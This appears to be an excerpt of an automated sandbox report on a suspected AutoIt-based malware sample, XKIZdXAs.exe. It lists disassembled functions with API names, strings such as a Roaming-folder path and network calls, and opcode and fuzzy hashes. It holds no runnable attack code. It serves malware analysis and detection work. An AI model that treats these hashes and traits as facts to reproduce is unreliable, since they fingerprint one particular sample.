                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 2979156933-0
                                                                          • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                          • Instruction ID: ef30b3b2f3cb9e0dc7ed32d2724750900e89845983adabf8fcb5e5a09ba13c58
                                                                          • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                          • Instruction Fuzzy Hash: 6321D432A0D7818EE711DF16A8402AAFA91FB88BD4FC64135E99D43B75EF3CD4068B50
                                                                          Function 00007FF7ADCAFA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                          • Instruction ID: a72deacd71fa9030cd36e69f0c1687f460e62becb17df1153b203b9cb4d00feb
                                                                          • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                          • Instruction Fuzzy Hash: 7B2138B6A05741DFEB00DF78D85419C77B0F348B48B804C26EB1893B28EB78D655CB10
                                                                          Function 00007FF7ADC74B28 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                          • String ID:
                                                                          • API String ID: 1352324309-0
                                                                          • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                          • Instruction ID: 7842f666bb6aec06833ecf6a54cb1d89020341f5fd0ae3d96e1d7e31939bb7b9
                                                                          • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                          • Instruction Fuzzy Hash: 7311A77271D942CAE7209F25E084369A3A0FB88B48FD64135C74D4B664EF7DD946CF60
                                                                          Function 00007FF7ADCB072C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 1539411459-0
                                                                          • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                          • Instruction ID: a32b6fc9642b6d1764e148afc6b01220eab454aa534d66db653fa7333bfedd97
                                                                          • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                          • Instruction Fuzzy Hash: DE01F536A2D3914AE7005B15B809768EF60FB86F90FD95134CE9903BB1DF7DD8428B10
                                                                          Function 00007FF7ADC3CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: gfffffff
                                                                          • API String ID: 3215553584-1523873471
                                                                          • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                          • Instruction ID: 5ea022d283c0111bb856dbf4189e8775e6943ccc5362b119ceafb5e46025197b
                                                                          • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                          • Instruction Fuzzy Hash: B1915A62A0E7868AEB19AF25924037CEB55EB257C0F858131DB8D073A5EE7DE153D310
                                                                          Function 00007FF7ADC71D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ContainedObject
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 3565006973-3941886329
                                                                          • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                          • Instruction ID: df8c7ac12b5b473fc01011790bec7fa7eaf935745cd90b0365c353d931063be5
                                                                          • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                          • Instruction Fuzzy Hash: B5914932609B4286DB24EF29E4506ADB3A4FB88F84F928136DF8D43724EF39D546C710
                                                                          Function 00007FF7ADC3D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: e+000$gfff
                                                                          • API String ID: 3215553584-3030954782
                                                                          • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                          • Instruction ID: c8a3eaddf643318eef1f8e57015c718eaa046421f77e2ad8394a09fceb800500
                                                                          • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                          • Instruction Fuzzy Hash: AB518C62B1D3C14AE7299F359940369FA91EB80F90FC98231C79C47BE6EE6CD446C710
                                                                          Function 00007FF7ADC3A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                          • String ID: C:\Users\user\AppData\Roaming\XKIZdXAs.exe
                                                                          • API String ID: 3307058713-1224080508
                                                                          • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                          • Instruction ID: 267802fbd298c3235825144c5bdf6a1549a5c814e77a595612e6ac84aecedefa
                                                                          • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                          • Instruction Fuzzy Hash: DC418D32A0EA52CDE719BF21D8400B9F7A5EF44B90BD64031E90E47B65EE7CE5538320
                                                                          Function 00007FF7ADCA9E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 3467290483-2160076837
                                                                          • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                          • Instruction ID: c0e97fb36f48c194cdc2d6878ce3fcb47fa3fa581b807df7473ca14ba4046852
                                                                          • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                          • Instruction Fuzzy Hash: 67411F3250D6C28AD6709F25E4407AEB761F784791F914135EBE903A69EF3CD4829B50
                                                                          Function 00007FF7ADC95E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 2496851823-2422070025
                                                                          • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                          • Instruction ID: 7d6a91d6e376482cc0de59e0abfa090b77b1e29a757a641d41b48c3d5813cd10
                                                                          • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                          • Instruction Fuzzy Hash: F131CF32A1D64289EB10EB22D85027DB760FB54BA4FD68531EA5E433A1FE3DD5468320
                                                                          Function 00007FF7ADC903C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _snwprintf
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                          • API String ID: 3988819677-2584243854
                                                                          • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                          • Instruction ID: 13e3bc2ca88392bbc2ad59719655b212609b6ab496cf0004e62a1070dcb62962
                                                                          • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                          • Instruction Fuzzy Hash: E2314F76B0EB0299EB14EB61E4512ECA365FB44784FC24032DA5D177A5EF38E50BC760
                                                                          Function 00007FF7ADC3DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType
                                                                          • String ID: @
                                                                          • API String ID: 3000768030-2766056989
                                                                          • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                          • Instruction ID: 9a17278861ce5882e093f0155a78e5f546b7b77bdf55424a4f6249e2c0e5672d
                                                                          • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                          • Instruction Fuzzy Hash: 1F21EA22A1D64245EB685B28A490238F750EB85B74FE61335D66E033F4EEBCD483D320
                                                                          Function 00007FF7ADCAA0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                          • Instruction ID: 16e4aa5d13f7d3e8259591f10d1dafb2b7106f76285b42fe2696498fdc784bb2
                                                                          • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                          • Instruction Fuzzy Hash: 4E314D32A09781CBD764DF29E44075AB7A5F788750F914239EB9943BA8DB3CE841CF10
                                                                          Function 00007FF7ADCA9BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                          • Instruction ID: 26bb9e34c6091c099a6b55a856172918179df50a937a045e765214d0dd870a05
                                                                          • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                          • Instruction Fuzzy Hash: F3312C36A0DB81CAE770DB15E44475AB7A1F784790FA54235EAA843BA8DF3CD842CF11
                                                                          Function 00007FF7ADC3FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _handle_error
                                                                          • String ID: "$pow
                                                                          • API String ID: 1757819995-713443511
                                                                          • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                          • Instruction ID: ff446f17b71b7cfb12fe9deb45ab3a8044001cc8d17dce8f58e87c695607de5d
                                                                          • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                          • Instruction Fuzzy Hash: FD216172D1CEC58BE374DF10E04466AFAA0FBDA344FA11325F68906A65DBBDD1429B10
                                                                          Function 00007FF7ADC6DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                          • Instruction ID: caae303b2795d2fa8878d2d793ad7ecd5904b63f499c0170f1cf55edf42486b9
                                                                          • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                          • Instruction Fuzzy Hash: 39110522A0EB8085F710EB11D4401E9A3A0FB99BA0FC54231DAAC477E9EE3CD107CB10
                                                                          Function 00007FF7ADC8E708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$OpenOption
                                                                          • String ID: <local>
                                                                          • API String ID: 942729171-4266983199
                                                                          • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                          • Instruction ID: 5e458eef6f9943aa6bbc0df3556580dff546ccb9a8518ccb625c5bf91e9c3570
                                                                          • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                          • Instruction Fuzzy Hash: 0711C83AE1E64186E7519B11E0007BDA365E780B49FE54035DA8D06AA8EF3EDC83CB10
                                                                          Function 00007FF7ADC6DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
